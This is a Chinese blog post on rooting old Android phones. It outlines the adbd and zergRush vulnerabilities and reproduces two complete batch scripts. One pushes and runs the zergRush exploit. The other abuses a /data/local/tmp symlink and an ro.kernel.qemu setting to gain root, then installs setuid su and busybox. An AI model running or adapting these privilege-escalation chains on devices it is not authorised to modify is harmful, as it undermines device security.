Android root 有感

最新推荐文章于 2024-05-21 22:08:30 发布

iteye_17686

最新推荐文章于 2024-05-21 22:08:30 发布

阅读量65

点赞数

文章标签：移动开发 shell 运维

1 Android下面想做事情，会有权限限制。所以经常需要提取Root权限。

2 Android下面获取Root权限的方法并不完全是一样的。这是由于Android的源码漏洞决定了的。提取Root权限就是利用Android系统的漏洞。所以不同的版本的漏洞是不一样的，才导致提取Root的方法是不一样的。

3 Android获取Root的最终步骤是：在System目录下的bin或xbin目录下，放一个有root权限的su文件。在xbin下面放入一个busybox文件；另外装上一个SuperUser.apk，用来管理权限的使用。

4 Android版本的漏洞有下面几个：

1 adbd中有个漏洞是创建线程成功时，降底进程的权限。但是创建进程时没有判断进程有没有创建成功。利用Shell进程最大数的限制，不断的Fork（）新的僵尸进程。从而达到进程限制上限。这样就可以让adbd创建不成功，从而跳过降权限的语句。

2 zergRush exploit :zergRush堆栈溢出.需要一个.zergRush的可执行文件.

3

4 Android4.0 提取ROOT.

重新链接.

5 提取Root的指令如下:

zerRush漏洞:

@echo --------------------------------------------------------------- @echoEasy rooting toolkit (v1.0) @echocreated by DooMLoRD @echousing exploit zergRush (Revolutionary Team) @echoCredits go to all those involved in making this possible! @echo --------------------------------------------------------------- @echo[*] This script will: @echo(1) root ur device using zergRush exploit @echo(2) install Busybox (1.18.4) @echo(3) install SU files (3.0.5) @echo[*] Before u begin: @echo(1) make sure u have installed adb drivers for ur device @echo(2) enable "USB DEBUGGING" @echofrom (Menu\Settings\Applications\Development) @echo(3) enable "UNKNOWN SOURCES" @echofrom (Menu\Settings\Applications) @echo(4) [OPTIONAL] increase screen timeout to 10 minutes @echo(5) connect USB cable to PHONE and then connect to PC @echo(6) skip "PC Companion Software" prompt on device @echo --------------------------------------------------------------- @echoCONFIRM ALL THE ABOVE THEN @pause @echo --- STARTING ---- @echo --- WAITING FOR DEVICE @files\adb wait-for-device @echo --- cleaning @files\adb shell "cd /data/local/tmp/; rm *" @echo --- pushing zergRush" @files\adb push files\zergRush /data/local/tmp/. @echo --- correcting permissions @files\adb shell "chmod 777 /data/local/tmp/zergRush" @echo --- executing zergRush @files\adb shell "./data/local/tmp/zergRush" @echo --- WAITING FOR DEVICE TO RECONNECT @echo if it gets stuck over here for a long time then try: @echodisconnect usb cable and reconnect it @echotoggle "USB DEBUGGING" (first disable it then enable it) @echo --- DEVICE FOUND @files\adb wait-for-device @echo --- pushing busybox @files\adb push files\busybox /data/local/tmp/. @echo --- correcting permissions @files\adb shell "chmod 755 /data/local/tmp/busybox" @echo --- remounting /system @files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system" @echo --- copying busybox to /system/xbin/ @files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox" @echo --- correcting ownership @files\adb shell "chown root.shell /system/xbin/busybox" @echo --- correcting permissions @files\adb shell "chmod 04755 /system/xbin/busybox" @echo --- installing busybox @files\adb shell "/system/xbin/busybox --install -s /system/xbin" @files\adb shell "rm -r /data/local/tmp/busybox" @echo --- pushing SU binary @files\adb push files\su /system/bin/su @echo --- correcting ownership @files\adb shell "chown root.shell /system/bin/su" @echo --- correcting permissions @files\adb shell "chmod 06755 /system/bin/su" @echo --- correcting symlinks @files\adb shell "rm /system/xbin/su" @files\adb shell "ln -s /system/bin/su /system/xbin/su" @echo --- pushing Superuser app @files\adb push files\Superuser.apk /system/app/. @echo --- cleaning @files\adb shell "cd /data/local/tmp/; rm *" @echo --- rebooting @files\adb reboot @echo ALL DONE!!! @pause

Android4.0下:

echo off

cls
echo.
echo by zopo008 (欢迎访问bbs.zopomobile.com.)
echo.
echo.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
echo Rebooting (1/3) - Continue once device finishes rebooting
echo 正在重启手机（第1次，共3次）- 请等待重启完毕，之后按任意键继续
pause

adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
echo Rebooting (2/3) - Continue once device finishes rebooting
echo 正在重启平板（第2次，共3次）- 请等待重启完毕，之后按任意键继续
pause

adb shell id
echo If the id is 0 / root then continue, otherwise ctrl+c to cancel and start over
echo 如果上面显示的id为0或者root，按任意键继续；否则按Ctrl-C并回复Y来取消本次root尝试，然后重试
pause

adb remount
adb push su /system/bin/su
adb shell chown 0.0 /system/bin/su
adb shell chmod 06755 /system/bin/su
adb push busybox /system/bin/busybox
adb shell chown 0.0 /system/bin/busybox
adb shell chmod 0755 /system/bin/busybox
adb push Superuser.apk /system/app/Superuser.apk
adb shell chown 0.0 /system/app/Superuser.apk
adb shell chmod 0644 /system/app/Superuser.apk
adb push RootExplorer.apk /system/app/RootExplorer.apk
adb shell chown 0.0 /system/app/RootExplorer.apk
adb shell chmod 0644 /system/app/RootExplorer.apk
echo Removing changes except ROOT
echo 正在进行清理和恢复
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot

echo Rebooting (3/3) - You should now be Rooted
echo 正在重启平板（第3次，共3次） - root成功
pause

echo on

iteye_17686

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Android root 有感

1 Android下面想做事情，会有权限限制。所以经常需要提取Root权限。2 Android下面获取Root权限的方法并不完全是一样的。这是由于Android的源码漏洞决定了的。提取Root权限就是利用Android系统的漏洞。所以不同的版本的漏洞是不一样的，才导致提取Root的方法是不一样的。3 Android获取Root的最终步骤是：在System目录下的bin或xbin...
复制链接

扫一扫